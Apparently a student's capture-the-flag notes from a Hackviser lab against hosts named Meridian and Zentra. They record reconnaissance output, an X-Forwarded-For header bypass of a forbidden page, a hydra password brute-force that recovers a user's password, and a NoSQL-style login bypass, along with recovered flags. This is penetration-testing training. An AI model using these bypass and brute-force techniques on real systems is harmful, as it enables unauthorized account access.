172.20.34.89 meridian.hv
172.20.34.54 zentra.hv

------

Meridian

What is the web server software and version running on Meridian?

i have done an nmap scan 

nmap -sVC -p- -T5 172.20.34.89                                                        
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-01 10:06 CEST
Verbosity Increased to 1.
Completed SYN Stealth Scan at 10:07, 25.50s elapsed (65535 total ports)
Initiating Service scan at 10:07
Scanning 2 services on meridian.hv (172.20.34.89)
Completed Service scan at 10:07, 6.08s elapsed (2 services on 1 host)
NSE: Script scanning 172.20.34.89.
Initiating NSE at 10:07
Completed NSE at 10:07, 1.07s elapsed
Initiating NSE at 10:07
Completed NSE at 10:07, 0.09s elapsed
Initiating NSE at 10:07
Completed NSE at 10:07, 0.00s elapsed
Nmap scan report for meridian.hv (172.20.34.89)
Host is up (0.022s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 95:30:f3:df:a0:a0:f5:2c:cb:3a:f7:4a:7d:c4:62:d5 (RSA)
|   256 21:d6:55:80:3b:05:0b:b6:f2:f3:0d:07:65:6a:87:41 (ECDSA)
|_  256 6b:5a:cd:21:7f:e0:a5:b2:96:02:18:13:56:db:8c:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.66
| http-robots.txt: 1 disallowed entry 
|_/a5b7zqw-internal
|_http-favicon: Unknown favicon MD5: C09DC1B57175A772971F7912AA0DAC68
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.66 (Debian)
|_http-title: Home \xE2\x80\x94 Meridian
Service Info: Host: _default_; OS: Linux; CPE: cpe:/o:linux:linux_kernel

and then for being sure

curl -I http://meridian.hv     
HTTP/1.1 200 OK
Date: Fri, 01 May 2026 08:08:59 GMT
Server: Apache/2.4.66 (Debian)
Content-Type: text/html; charset=UTF-8

What is the server-side programming language used by Meridian?

curl http://meridian.hv/services.php
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Meridian Digital Agency — We craft digital experiences that drive results.">
    <title>Services — Meridian</title>
    <link rel="icon" type="image/svg+xml" href="/favicon.svg">
    <link rel="stylesheet" href="/fonts/inter.css">
    <link rel="stylesheet" href="/css/style.css">
</head>

What is the directory excluded from search engine indexing on Meridian?

80/tcp open  http    Apache httpd 2.4.66
| http-robots.txt: 1 disallowed entry 
|_/a5b7zqw-internal

What is the admin panel directory of Meridian?

gobuster dir -u http://meridian.hv -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -b 403,404 

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://meridian.hv
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/includes             (Status: 301) [Size: 353] [--> http://meridian.hv/includes/]
/js                   (Status: 301) [Size: 347] [--> http://meridian.hv/js/]
/css                  (Status: 301) [Size: 348] [--> http://meridian.hv/css/]
/img                  (Status: 301) [Size: 348] [--> http://meridian.hv/img/]
/fonts                (Status: 301) [Size: 350] [--> http://meridian.hv/fonts/]
/webadmin             (Status: 301) [Size: 353] [--> http://meridian.hv/webadmin/]
/vendor               (Status: 301) [Size: 351] [--> http://meridian.hv/vendor/]
Progress: 12274 / 56163 (21.85%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 12398 / 56163 (22.08%)

What is the active subdomain found on Meridian?

ffuf -u http://meridian.hv -H "Host: FUZZ.meridian.hv" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt           

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://meridian.hv
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.meridian.hv
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

action                  [Status: 200, Size: 1023, Words: 379, Lines: 51, Duration: 24ms]
:: Progress: [4989/4989] :: Job [1/1] :: 1639 req/sec :: Duration: [0:00:05] :: Errors: 0 ::

The /hidden-page page on Meridian returns a 403 Forbidden response. What is the hidden information on the page when the access control is bypassed?

curl -H "X-Forwarded-For: 127.0.0.1" http://meridian.hv/hidden-page/
Artemis  

Crack the password of the black user on Meridian's admin panel using a dictionary attack. What is the account password? (Wordlist: SecLists → Passwords → darkweb2017-top1000.txt)

└─$ hydra -l black -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt meridian.hv http-post-form "/webadmin/login.php:username=^USER^&password=^PASS^:F=Invalid username or password" 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-05-01 10:55:34
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:1/p:10000), ~625 tries per task
[DATA] attacking http-post-form://meridian.hv:80/webadmin/login.php:username=^USER^&password=^PASS^:F=Invalid username or password
[80][http-post-form] host: meridian.hv   login: black   password: hunter
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-05-01 10:55:38

After logging into Meridian's admin panel as the black user, identify the relevant vulnerability and view the admin user's information. What is the admin user's email address?

-> vedere immagine vulnerabilità idor

After logging into Meridian's admin panel as the black user, identify the relevant vulnerability and gain access to the admin user's account. What is the flag visible only to the admin user?

-> cookie creation

After logging into Meridian's admin panel as the admin user, identify the relevant vulnerability and read the contents of the /flag.txt file on the system. What is the obtained flag?

HTTP/1.1 200 OK
Date: Fri, 01 May 2026 09:39:32 GMT
Server: Apache/2.4.66 (Debian)
Content-Length: 412
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json

{"success":true,"data":{"sitename":"Hackviser{5540522f6d546b18895ae39051af0497}","tagline":"Crafting digital experiences","contact_email":"hello@meridian.hv","language":"English (en-US)","smtp.host":"mail.meridian.hv","smtp.port":"587","smtp.username":"noreply@meridian.hv","smtp.encryption":"TLS","backup.schedule":"daily","backup.retention":"30","backup.path":"\/var\/backups\/meridian","cache_driver":"file"}}

└─$ curl -X POST http://zentra.hv/login \
-H "Content-Type: application/json" \
-d '{"username":"admin","password":{"password":1}}'     
{"success":true,"redirect":"/dashboard"} 
